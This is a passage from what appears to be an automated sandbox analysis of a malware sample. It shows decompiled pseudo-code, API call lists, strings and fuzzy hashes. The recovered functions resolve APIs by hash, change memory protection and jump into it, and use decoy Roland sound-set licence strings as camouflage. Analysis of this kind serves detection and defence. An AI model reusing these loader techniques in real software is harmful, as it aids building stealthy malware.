									 *0x46cc30 =  *((intOrPtr*)(_t223 + 0x1c)) + _t123;
								}
								if( *((intOrPtr*)(_t223 + 0x5c)) != 0) {
									 *((intOrPtr*)(_t223 + 0x50)) =  *((intOrPtr*)(_t223 + 0x48)) +  *((intOrPtr*)(_t223 + 0x1c));
									_t127 = E0040154F(_t223,  &_a4, 0xcc81fc5d);
									_v12 = _t127;
									if(_t127 != 0) {
										_t179 = _a4;
										_t214 = HeapAlloc(GetProcessHeap(), 8, _t179 + 5);
										if(_t214 != 0) {
											_t107 = _t214 + 4; // 0x4
											 *_t214 = _t179;
											E004143A0(_t107, _v12, _t179);
											 *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x58)) + 4)) = _t214;
										}
									}
								}
								goto L47;
							}
							_v8 = _v8 & 0x00000000;
							_v16 = _a4;
							_t137 = NtAllocateVirtualMemory(0xffffffff,  &_v8, 0,  &_v16, 0x1000, 4); // executed
							if(_t137 != 0) {
								goto L41;
							}
							_t215 = HeapAlloc( *(_t223 + 0x18), 8, 0x1c);
							if(_t215 == 0) {
								_v12 = _v12 & 0x00000000;
							} else {
								 *((intOrPtr*)(_t215 + 0x18)) = _a4;
								 *((intOrPtr*)(_t215 + 0xc)) = 1;
								_t158 = InterlockedIncrement(_t223 + 0x40);
								 *(_t215 + 0x14) =  *(_t215 + 0x14) & 0x00000000;
								 *(_t215 + 8) = _t158;
								 *((intOrPtr*)(_t215 + 0x10)) = _v12;
								_t160 = _t223 + 0xdc;
								_t200 =  *_t160;
								 *_t215 = _t200;
								 *((intOrPtr*)(_t200 + 4)) = _t215;
								 *((intOrPtr*)(_t215 + 4)) = _t160;
								 *_t160 = _t215;
								_v12 =  *(_t215 + 8);
							}
							if(_v12 <= 0) {
								goto L41;
							} else {
								_v20 = _v8;
								_t216 = HeapAlloc( *(_t223 + 0x18), 8, 0x1c);
								if(_t216 == 0) {
									_t217 = 0;
								} else {
									 *(_t216 + 0xc) =  *(_t216 + 0xc) & 0x00000000;
									 *((intOrPtr*)(_t216 + 0x18)) = _a4;
									_t153 = InterlockedIncrement(_t223 + 0x40);
									 *(_t216 + 0x14) =  *(_t216 + 0x14) & 0x00000000;
									 *(_t216 + 8) = _t153;
									 *((intOrPtr*)(_t216 + 0x10)) = _v20;
									_t155 = _t223 + 0xdc;
									_t199 =  *_t155;
									 *_t216 = _t199;
									 *((intOrPtr*)(_t199 + 4)) = _t216;
									 *((intOrPtr*)(_t216 + 4)) = _t155;
									 *_t155 = _t216;
									_t217 =  *(_t216 + 8);
								}
								if(_t217 <= 0) {
									L34:
									_t193 = _t223 + 0xdc;
									if(_t193 ==  *_t193) {
										goto L41;
									}
									_t141 =  *(_t223 + 0xe0);
									while(_t141 != _t193) {
										if( *((intOrPtr*)(_t141 + 8)) == _v12) {
											 *( *(_t141 + 4)) =  *_t141;
											 *( *_t141 + 4) =  *(_t141 + 4);
											HeapFree( *(_t223 + 0x18), 0, _t141);
											goto L41;
										}
										_t141 =  *(_t141 + 4);
									}
									goto L41;
								} else {
									E004143A0(_v8, _t223 + 0x68, 0x18);
									_push(_a4);
									_push(_t217);
									_push(_v12);
									E0040358D(_t223 + 0xa0, _t223 + 0xa0, 3);
									 *((intOrPtr*)(_t223 + 0x60)) = _v16;
									_t196 = _t223 + 0xdc;
									_t224 = _t224 + 0x20;
									 *((intOrPtr*)(_t223 + 0x5c)) = _v8;
									if(_t196 ==  *_t196) {
										goto L34;
									}
									_t149 =  *(_t223 + 0xe0);
									while(_t149 != _t196) {
										if( *((intOrPtr*)(_t149 + 8)) == _t217) {
											 *( *(_t149 + 4)) =  *_t149;
											 *( *_t149 + 4) =  *(_t149 + 4);
											HeapFree( *(_t223 + 0x18), 0, _t149);
											goto L34;
										}
										_t149 =  *(_t149 + 4);
									}
									goto L34;
								}
							}
						}
					}
					if( *((intOrPtr*)(_t223 + 0x1c)) != _t211) {
						_push(0xd0c1869c);
						_t168 = E0040358D(_t223 + 0xa0, _t223 + 0xa0, _t211);
						_t224 = _t224 + 0xc;
						if(_t168 > 0) {
							E00414310( &_v304, 0, 0x11c);
							_t224 = _t224 + 0xc;
							_push( &_v304);
							_v304 = 0x11c;
							if( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x1c)) + _t168))() >= 0 && _v300 == 5) {
								_v8 = E0040159B;
							}
						}
					}
					if( *((intOrPtr*)(_t223 + 0x20)) != 0) {
						_push(0x48c1e483);
						_t163 = E0040358D(_t223 + 0xa0, _t223 + 0xa0, 2);
						_t224 = _t224 + 0xc;
						if(_t163 > 0) {
							_t165 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0x20)) + _t163))(GetCurrentProcess(), 0, 0x1000, 0x3000, 4, 0); // executed
							_v8 = _t165;
							if(_t165 != 0) {
								E00414310(_t165, 0xcd, 0x1000);
								_t224 = _t224 + 0xc;
							}
						}
					}
					goto L14;
				}
			}

0x004015a4
0x004015a7
0x004015ac
0x004015b0
0x004018fa
0x004015b6
0x004015b6
0x004015bd
0x004015c0
0x004015d3
0x004015d3
0x004015db
0x00401691
0x00401695
0x004018cf
0x004018d2
0x004018d9
0x004018e0
0x004018e3
0x004018e6
0x004018e8
0x004018ee
0x004018f2
0x004018f5
0x00000000
0x004016b0
0x004016ba
0x004016c2
0x004016c5
0x00401850
0x00401850
0x0040185e
0x00401868
0x0040186f
0x0040186f
0x00401879
0x00401886
0x0040188e
0x00401896
0x00401899
0x0040189b
0x004018b1
0x004018b5
0x004018bb
0x004018bf
0x004018c1
0x004018cc
0x004018cc
0x004018b5
0x00401899
0x00000000
0x00401879
0x004016ce
0x004016db
0x004016e9
0x004016ed
0x00000000
0x00000000
0x00401706
0x0040170a
0x00401746
0x0040170c
0x0040170f
0x00401716
0x0040171d
0x0040171f
0x00401723
0x00401729
0x0040172c
0x00401732
0x00401734
0x00401736
0x00401739
0x0040173c
0x00401741
0x00401741
0x0040174e
0x00000000
0x00401754
0x0040175e
0x00401767
0x0040176b
0x004017a1
0x0040176d
0x00401770
0x00401774
0x0040177b
0x0040177d
0x00401781
0x00401787
0x0040178a
0x00401790
0x00401792
0x00401794
0x00401797
0x0040179a
0x0040179c
0x0040179c
0x004017ab
0x00401816
0x00401816
0x0040181e
0x00000000
0x00000000
0x00401820
0x00401833
0x0040182e
0x0040183e
0x00401848
0x0040184e
0x00000000
0x0040184e
0x00401830
0x00401830
0x00000000
0x004017ad
0x004017b6
0x004017bb
0x004017c4
0x004017c5
0x004017cb
0x004017d3
0x004017d9
0x004017df
0x004017e4
0x004017e7
0x00000000
0x00000000
0x004017e9
0x004017f9
0x004017f4
0x00401804
0x0040180e
0x00401814
0x00000000
0x00401814
0x004017f6
0x004017f6
0x00000000
0x004017fd
0x004017ab
0x0040174e
0x00401695
0x004015e4
0x004015e6
0x004015f3
0x004015f8
0x004015fd
0x00401612
0x00401617
0x00401620
0x00401621
0x0040162f
0x0040163a
0x0040163a
0x0040162f
0x004015fd
0x00401645
0x00401647
0x00401655
0x0040165a
0x0040165f
0x00401679
0x0040167d
0x00401680
0x00401689
0x0040168e
0x0040168e
0x00401680
0x0040165f
0x00000000
0x00401645

APIs

GetCurrentProcess.KERNEL32(00000000,00001000,00003000,00000004,00000000), ref: 00401672
VirtualAllocExNuma.KERNELBASE(00000000), ref: 00401679
NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,?,00001000,00000004), ref: 004016E9
HeapAlloc.KERNEL32(?,00000008,0000001C), ref: 004016FA
InterlockedIncrement.KERNEL32(?), ref: 0040171D
HeapAlloc.KERNEL32(?,00000008,0000001C), ref: 00401761
InterlockedIncrement.KERNEL32(?), ref: 0040177B
HeapFree.KERNEL32(?,00000000,?), ref: 00401814
HeapFree.KERNEL32(?,00000000,?), ref: 0040184E
GetProcessHeap.KERNEL32(00000008,?), ref: 004018A4
HeapAlloc.KERNEL32(00000000), ref: 004018AB

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$Alloc$FreeIncrementInterlockedProcessVirtual$AllocateCurrentMemoryNuma
String ID:
API String ID: 4195083987-0
Opcode ID: 5028118c1a37e99dfdd156ee144178752ec60f3c15942ce11da6baf750ae5efa
Instruction ID: 38887d51ed6f98415a750cd44d06d6ae4b0f458c9c7a50ec3d23c05c961d98a0
Opcode Fuzzy Hash: 5028118c1a37e99dfdd156ee144178752ec60f3c15942ce11da6baf750ae5efa
Instruction Fuzzy Hash: 62C17972A00705EFDB20DF65C880B9AB7F9FF44304F14856EE54AAB2A0D774EA44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040203B Relevance: 1.5, APIs: 1, Instructions: 29
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040203B(void* __ecx, long _a4) {
				void* _v8;
				long _v12;
				long _t11;
				intOrPtr* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					_v8 =  *_t20;
					_a4 =  *((intOrPtr*)(_t20 + 4));
					_t11 = NtProtectVirtualMemory(0xffffffff,  &_v8,  &_a4,  *(_t20 + 8),  &_v12);
					if(_t11 == 0) {
						_t11 =  *_t20( *((intOrPtr*)(_t20 + 0xc)));
					}
				}
				return _t11;
			}

0x00402041
0x00402046
0x0040204a
0x00402050
0x00402065
0x0040206a
0x0040206f
0x0040206f
0x0040206a
0x00402073

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 00402065

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: ac57ed65450d34dcd13f0ce141c3d7b172bbb724d120a1c83ed115710022ecf5
Instruction ID: 6732020d6493ad76e5ec4cbf0a313d2acb0a5b5f5d7c35f3ae1e29de2d6d608d
Opcode Fuzzy Hash: ac57ed65450d34dcd13f0ce141c3d7b172bbb724d120a1c83ed115710022ecf5
Instruction Fuzzy Hash: F5F09E76500618AFDB20CF54C945DDBB7ECEF14754710861AB956D7290E770FE44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 023D003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 023D024D

Strings

kernel32.dll, xrefs: 023D008F, 023D0095
cess, xrefs: 023D018D

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 090c17577752addc852be46cdb85d1a3ee30e49251c4315ba011aac6367306e5
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 37526975A01229DFDB64CF68D984BACBBB5BF09304F1480D9E94DAB351DB30AA85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00402397 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
memoryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00402397(void* __ecx, signed int _a4) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				char _v32;
				void _v92;
				intOrPtr* _t61;
				void* _t63;
				intOrPtr* _t64;
				signed short _t77;
				signed int _t78;
				intOrPtr* _t90;
				intOrPtr _t91;
				intOrPtr _t96;
				intOrPtr* _t98;
				signed int _t99;
				intOrPtr _t103;
				intOrPtr* _t109;
				void* _t112;
				intOrPtr* _t114;
				void* _t115;
				void* _t116;
				void* _t117;

				_t61 = _a4;
				_t91 =  *_t61;
				if(_t91 != 0) {
					_a4 = _a4 & 0x00000000;
					_t63 = E00402295(__ecx,  *(_t91 + 0x18),  &_a4);
					_v12 = _t63;
					if(_t63 != 0) {
						if((_a4 & 0x0000000f) == 0) {
							_t99 = 0xe;
							memcpy( &_v92, "Roland GS Sound Set/Microsoft (P) 1996 Roland Corporation", _t99 << 2);
							_t116 = _t115 + 0xc;
							asm("movsw");
							_t112 = HeapAlloc( *(_t91 + 0x18), 8, _a4);
							_v8 = _t112;
							if(_t112 != 0) {
								E004143A0( &_v32, 0x41b484, 0x10);
								E00402331(_a4, 0,  &_v32, _v12, _t112);
								E004143A0(_t91 + 0x68,  &_v92, 0x18);
								_t117 = _t116 + 0x24;
								if( *_t112 == 0x5346) {
									_t77 =  *((intOrPtr*)(_t112 + 2));
									if(_t77 < 0xa) {
										_a4 = _a4 & 0x00000000;
										_t78 = _t77 & 0x0000ffff;
										_t27 = (_t78 + _t78 * 2) * 4; // 0x4
										_t29 = _t112 + 4; // 0x4
										_t109 = _t29;
										_v16 = _t112 + _t27 + 4;
										if(_t78 > 0) {
											do {
												_t114 = HeapAlloc( *(_t91 + 0x18), 8,  *((intOrPtr*)(_t109 + 8)) + 0x14);
												if(_t114 != 0) {
													 *((intOrPtr*)(_t114 + 8)) =  *_t109;
													 *((intOrPtr*)(_t114 + 0xc)) =  *((intOrPtr*)(_t109 + 8));
													_t39 = _t114 + 0x10; // 0x10
													E004143A0(_t39,  *((intOrPtr*)(_t109 + 4)) + _v16,  *((intOrPtr*)(_t109 + 8)));
													_t90 = _t91 + 0xd4;
													_t103 =  *_t90;
													 *_t114 = _t103;
													 *((intOrPtr*)(_t103 + 4)) = _t114;
													 *((intOrPtr*)(_t114 + 4)) = _t90;
													_t117 = _t117 + 0xc;
													 *_t90 = _t114;
												}
												_a4 = _a4 + 1;
												_t109 = _t109 + 0xc;
											} while (_a4 < ( *(_v8 + 2) & 0x0000ffff));
											_t112 = _v8;
										}
									}
								}
								RtlFreeHeap( *(_t91 + 0x18), 0, _t112); // executed
							}
						}
						RtlFreeHeap( *(_t91 + 0x18), 0, _v12); // executed
					}
					_t61 = _t91 + 0xd4;
					if(_t61 !=  *_t61) {
						 *((intOrPtr*)(_t91 + 8)) = E00401FCA;
						 *((intOrPtr*)(_t91 + 0xc)) = 0x12c;
						_t96 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 4)) + 4));
						_t64 = _t91 + 0x10;
						 *_t64 = _t96;
						 *((intOrPtr*)(_t96 + 4)) = _t64;
						_t98 =  *((intOrPtr*)(_t91 + 4)) + 4;
						 *((intOrPtr*)(_t91 + 0x14)) = _t98;
						 *_t98 = _t64;
						return _t64;
					}
				}
				return _t61;
			}

0x0040239d
0x004023a1
0x004023a5
0x004023ab
0x004023b6
0x004023bf
0x004023c2
0x004023cc
0x004023d6
0x004023e2
0x004023e2
0x004023e9
0x004023f1
0x004023f5
0x004023f8
0x00402409
0x00402419
0x00402428
0x0040242d
0x00402435
0x0040243b
0x00402443
0x00402445
0x00402449
0x00402451
0x00402455
0x00402455
0x00402458
0x0040245b
0x0040245d
0x0040246f
0x00402473
0x00402477
0x0040247d
0x0040248a
0x0040248e
0x00402493
0x00402499
0x0040249b
0x0040249d
0x004024a0
0x004024a3
0x004024a6
0x004024a6
0x004024af
0x004024b2
0x004024b5
0x004024ba
0x004024ba
0x0040245b
0x00402443
0x004024c3
0x004024c3
0x004024ca
0x004024d3
0x004024d3
0x004024d9
0x004024e1
0x004024e6
0x004024ed
0x004024f4
0x004024f7
0x004024fa
0x004024fc
0x00402502
0x00402505
0x00402508
0x00000000
0x00402508
0x004024e1
0x0040250c

APIs

Part of subcall function 00402295: HeapAlloc.KERNEL32(?,00000008,0004B000), ref: 004022A5

HeapAlloc.KERNEL32(?,00000008,0000000F), ref: 004023EB
HeapAlloc.KERNEL32(?,00000008,?), ref: 00402469
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 004024C3
RtlFreeHeap.NTDLL(?,00000000,0000000F), ref: 004024D3

Strings

Roland GS Sound Set/Microsoft (P) 1996 Roland Corporation, xrefs: 004023DA

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$Alloc$Free
String ID: Roland GS Sound Set/Microsoft (P) 1996 Roland Corporation
API String ID: 1549400367-2110447102
Opcode ID: c7b2586a5a01f42146efed1f46cadd82c7c90c1c508415c62484aa49e6140836
Instruction ID: b4fcd9272074d467d53119f43b0509aaa747500ddd9286e9d2f1505adf3e2c77
Opcode Fuzzy Hash: c7b2586a5a01f42146efed1f46cadd82c7c90c1c508415c62484aa49e6140836
Instruction Fuzzy Hash: BC519E71900209EFCB11CF54D985BAABBF8FF04314F1084AAE919AB291D774E995CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 00414DB1 Relevance: 7.5, APIs: 5, Instructions: 37
threadCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00414DB1() {
				void* __ebx;
				void* __esi;
				long _t5;
				long* _t6;
				long _t11;
				long _t12;
				void* _t16;
				long* _t17;

				_t5 = GetLastError();
				_t12 = _t5; // executed
				_t6 =  *0x46cc70( *0x46c04c); // executed
				_t17 = _t6;
				_t18 = _t17;
				if(_t17 == 0) {
					_push(0x8c);
					_push(1);
					_t17 = E004164E1(_t12, _t16, _t17, _t18);
					if(_t17 == 0) {
						L4:
						E00414B6D(0x10);
					} else {
						_push(_t17);
						_push( *0x46c04c);
						if( *0x46cc74() == 0) {
							goto L4;
						} else {
							_t17[0x15] = 0x46c100;
							_t17[5] = 1;
							_t11 = GetCurrentThreadId();
							_t17[1] = _t17[1] | 0xffffffff;
							 *_t17 = _t11;
						}
					}
				}
				SetLastError(_t12);
				return _t17;
			}

0x00414db3
0x00414dbf
0x00414dc1
0x00414dc7
0x00414dc9
0x00414dcb
0x00414dcd
0x00414dd2
0x00414dd9
0x00414ddf
0x00414e0e
0x00414e10
0x00414de1
0x00414de1
0x00414de2
0x00414df0
0x00000000
0x00414df2
0x00414df2
0x00414df9
0x00414e00
0x00414e06
0x00414e0a
0x00414e0a
0x00414df0
0x00414ddf
0x00414e17
0x00414e21

APIs

GetLastError.KERNEL32(?,00000000,00418BEC,00416472,00000000,0046A108,00000008,004164C9,?,?,?,00416C6D,00000004,0046A2C8,0000000C,004163C9), ref: 00414DB3
FlsGetValue.KERNEL32(?,00416C6D,00000004,0046A2C8,0000000C,004163C9,00000000,?,00415053,?,00469BF8,00000060), ref: 00414DC1
SetLastError.KERNEL32(00000000,?,00416C6D,00000004,0046A2C8,0000000C,004163C9,00000000,?,00415053,?,00469BF8,00000060), ref: 00414E17

Part of subcall function 004164E1: __lock.LIBCMT ref: 00416525
Part of subcall function 004164E1: HeapAlloc.KERNEL32(00000008,?,0046A118,00000010,00414DD9,00000001,0000008C,?,00416C6D,00000004,0046A2C8,0000000C,004163C9,00000000,?,00415053), ref: 00416563

FlsSetValue.KERNEL32(00000000,?,00416C6D,00000004,0046A2C8,0000000C,004163C9,00000000,?,00415053,?,00469BF8,00000060), ref: 00414DE8
GetCurrentThreadId.KERNEL32 ref: 00414E00

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread__lock
String ID:
API String ID: 3368326513-0
Opcode ID: 12f544027e430db05bde684fdec541818b8688e2dfe7760ed1267b77d1f21185
Instruction ID: 145546318f8694a62b49602e2fe45e5639560225c7f5b4783c87f0de07014175
Opcode Fuzzy Hash: 12f544027e430db05bde684fdec541818b8688e2dfe7760ed1267b77d1f21185
Instruction Fuzzy Hash: 00F0C231641721DBD3302F74AD4D6973AA4FB00B61B00423AE596862A2DFB8C8848BED

Uniqueness

Uniqueness Score: -1.00%

Function 00402750 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402750(long _a12) {

				OutputDebugStringA("[ERROR] All other uses require a separate written license from Roland\n"); // executed
				E0040250D(_a12, 0x41b378); // executed
				return 0;
			}

0x00402755
0x00402764
0x0040276d

APIs

OutputDebugStringA.KERNELBASE([ERROR] All other uses require a separate written license from Roland,00414D3A,00000000), ref: 00402755

Part of subcall function 0040250D: HeapCreate.KERNELBASE(00000000,00100000,01000000,00000000), ref: 0040252B
Part of subcall function 0040250D: VirtualQuery.KERNEL32(00402076,?,0000001C), ref: 0040253F
Part of subcall function 0040250D: GetModuleHandleW.KERNEL32(00000000), ref: 0040254A
Part of subcall function 0040250D: OutputDebugStringA.KERNELBASE([ERROR] The Roland SoundCanvas Sound Set is licensed under Microsoft's End User License Agreement), ref: 0040255B
Part of subcall function 0040250D: HeapAlloc.KERNEL32(?,00000008,000000E4,74CB4DE0), ref: 004025B7
Part of subcall function 0040250D: HeapAlloc.KERNEL32(?,00000008,0000000C), ref: 004025E6

Strings

[ERROR] All other uses require a separate written license from Roland, xrefs: 00402750

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocDebugOutputString$CreateHandleModuleQueryVirtual
String ID: [ERROR] All other uses require a separate written license from Roland
API String ID: 2804738134-3057898529
Opcode ID: 00b9169021c09aa1aae93a26a38fb32654a22ef8bf6b444f501eb1d5136831e2
Instruction ID: ef606dd987e56fe4379e3a8b1382bfd10a5b26647fd1e9626f5d95ec0968d17d
Opcode Fuzzy Hash: 00b9169021c09aa1aae93a26a38fb32654a22ef8bf6b444f501eb1d5136831e2
Instruction Fuzzy Hash: A5B09B3315934567C1045F71DD0FD4E2651D650715B60882BB461500D1DFA5409495DD

Uniqueness

Uniqueness Score: -1.00%

Function 00401F1A Relevance: 3.1, APIs: 2, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401F1A(void* __ebx, void* __ecx, void* __edi, void _a4) {
				intOrPtr _v8;
				intOrPtr* _t20;
				intOrPtr _t22;
				intOrPtr _t24;
				void* _t27;
				void _t32;
				intOrPtr _t36;
				intOrPtr* _t38;
				void* _t42;
				intOrPtr _t45;

				_t20 = _a4;
				_t45 =  *_t20;
				if(_t45 != 0) {
					_push(0xd33bcabd);
					_t22 = E0040358D(_t45 + 0xa0, _t45 + 0xa0, 0);
					 *((intOrPtr*)(_t45 + 0x44)) = _t22;
					if(_t22 == 0) {
						 *((intOrPtr*)(_t45 + 8)) = E00401584;
					} else {
						_t24 = E0040154F(_t45,  &_a4, 0xfa9d947f);
						_v8 = _t24;
						if(_t24 != 0) {
							_t32 = _a4;
							_t27 = RtlAllocateHeap(GetProcessHeap(), 8, _t32 + 5); // executed
							_t42 = _t27;
							if(_t42 != 0) {
								_t9 = _t42 + 4; // 0x4
								 *_t42 = _t32;
								E004143A0(_t9, _v8, _t32);
								 *( *(_t45 + 0x58)) = _t42;
							}
						}
						 *((intOrPtr*)(_t45 + 8)) = E00401DFD;
					}
					 *((intOrPtr*)(_t45 + 0xc)) = 0x12c;
					_t36 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 4)) + 4));
					_t20 = _t45 + 0x10;
					 *_t20 = _t36;
					 *((intOrPtr*)(_t36 + 4)) = _t20;
					_t38 =  *((intOrPtr*)(_t45 + 4)) + 4;
					 *((intOrPtr*)(_t45 + 0x14)) = _t38;
					 *_t38 = _t20;
				}
				return _t20;
			}

0x00401f1e
0x00401f22
0x00401f26
0x00401f2c
0x00401f3a
0x00401f44
0x00401f47
0x00401fa0
0x00401f49
0x00401f53
0x00401f5b
0x00401f5e
0x00401f61
0x00401f72
0x00401f78
0x00401f7c
0x00401f82
0x00401f86
0x00401f88
0x00401f93
0x00401f93
0x00401f96
0x00401f97
0x00401f97
0x00401faa
0x00401fb1
0x00401fb4
0x00401fb7
0x00401fb9
0x00401fbf
0x00401fc2
0x00401fc5
0x00401fc5
0x00401fc9

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 00401F6B
RtlAllocateHeap.NTDLL(00000000), ref: 00401F72

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 2f1aa9da4b5caacec7efc231aebd6f204c207739079adbf696484fbeece929cf
Instruction ID: 07a86eb94649710377f2e5a248b6ff04bb32b30cd34781f7e5a64da77f86fc62
Opcode Fuzzy Hash: 2f1aa9da4b5caacec7efc231aebd6f204c207739079adbf696484fbeece929cf
Instruction Fuzzy Hash: 54218EB1500705AFC710DF59D840A96BBF8EF48308B14847EE94AEB390D734E904CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00417C58 Relevance: 3.0, APIs: 2, Instructions: 34
memoryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00417C58(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t21;
				void* _t24;

				_push(0xc);
				_push(0x46a368);
				E004161C8(__ebx, __edi, __esi);
				_t19 =  *(_t21 + 8);
				if( *0x46d364 != 3) {
					L3:
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					if( *0x46d364 != 1) {
						_t19 = _t19 + 0x0000000f & 0xfffffff0;
					}
					_t9 = RtlAllocateHeap( *0x46d360, 0, _t19); // executed
				} else {
					_t24 = _t19 -  *0x46d11c; // 0x0
					if(_t24 > 0) {
						goto L3;
					} else {
						E004164B0(__ebx, __edi, 4);
						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
						_push(_t19);
						 *(_t21 - 0x1c) = E004185D3();
						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
						E00417CCA();
						_t9 =  *(_t21 - 0x1c);
						if( *(_t21 - 0x1c) == 0) {
							goto L3;
						}
					}
				}
				return E00416203(_t9);
			}

0x00417c58
0x00417c5a
0x00417c5f
0x00417c64
0x00417c6e
0x00417c9e
0x00417ca0
0x00417ca2
0x00417ca2
0x00417caa
0x00417caf
0x00417caf
0x00417cbb
0x00417c70
0x00417c70
0x00417c76
0x00000000
0x00417c78
0x00417c7a
0x00417c80
0x00417c84
0x00417c8b
0x00417c8e
0x00417c92
0x00417c97
0x00417c9c
0x00000000
0x00000000
0x00417c9c
0x00417c76
0x00417cc6

APIs

__lock.LIBCMT ref: 00417C7A

Part of subcall function 004164B0: EnterCriticalSection.KERNEL32(?,?,?,00416C6D,00000004,0046A2C8,0000000C,004163C9,00000000,?,00415053,?,00469BF8,00000060), ref: 004164D8

RtlAllocateHeap.NTDLL(00000000,?,0046A368,0000000C,00417CE3,000000E0,00417D0E,?,00416433,00000018,0046A108,00000008,004164C9,?,?), ref: 00417CBB

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocateCriticalEnterHeapSection__lock
String ID:
API String ID: 409319249-0
Opcode ID: 2f4b3f731ee1271172cf0d54dcdd16e8055866473dd8cfc9cfbb62fbaa21bdb7
Instruction ID: 700728b27aa3b62636cbeb43b3e44a8c68f1c3ad0e5ac9ab09415657f0882008
Opcode Fuzzy Hash: 2f4b3f731ee1271172cf0d54dcdd16e8055866473dd8cfc9cfbb62fbaa21bdb7
Instruction Fuzzy Hash: EEF0C232E0561597CB20AB619C067CF7631BB05724F21412AEC24273E1E77C59C0CACE

Uniqueness

Uniqueness Score: -1.00%

Function 00416177 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416177(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x46d360 = _t6;
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					_t8 = E0041615D();
					 *0x46d364 = _t8;
					if(_t8 != 3 || E00417DAC(0x3f8) != 0) {
						return 1;
					} else {
						HeapDestroy( *0x46d360);
						goto L4;
					}
				}
			}

0x00416188
0x00416190
0x00416195
0x004161c1
0x004161c3
0x00416197
0x00416197
0x0041619f
0x004161a4
0x004161c7
0x004161b5
0x004161bb
0x00000000
0x004161bb
0x004161a4

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00414C84,00000001,?,00469BF8,00000060), ref: 00416188

Part of subcall function 00417DAC: HeapAlloc.KERNEL32(00000000,00000140,004161B0,000003F8,?,00469BF8,00000060), ref: 00417DB9

HeapDestroy.KERNEL32(?,00469BF8,00000060), ref: 004161BB

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: d3529871b9fdb40f711082d9c64b48a278dad9e22c65f439bdc57a8b2223bda1
Instruction ID: 880d42d31dff7e5574ecb9fb41e3d59a2c644dd8237f1fda8e472aceb9b332c5
Opcode Fuzzy Hash: d3529871b9fdb40f711082d9c64b48a278dad9e22c65f439bdc57a8b2223bda1
Instruction Fuzzy Hash: 7DE04871F553417ADB106B315D097AE36D4FB44746F01443AF414C62A1FB74C4C4D60E

Uniqueness

Uniqueness Score: -1.00%

Function 023D0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,023D0223,?,?), ref: 023D0E19
SetErrorMode.KERNELBASE(00000000,?,?,023D0223,?,?), ref: 023D0E1E

Memory Dump Source

Source File: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
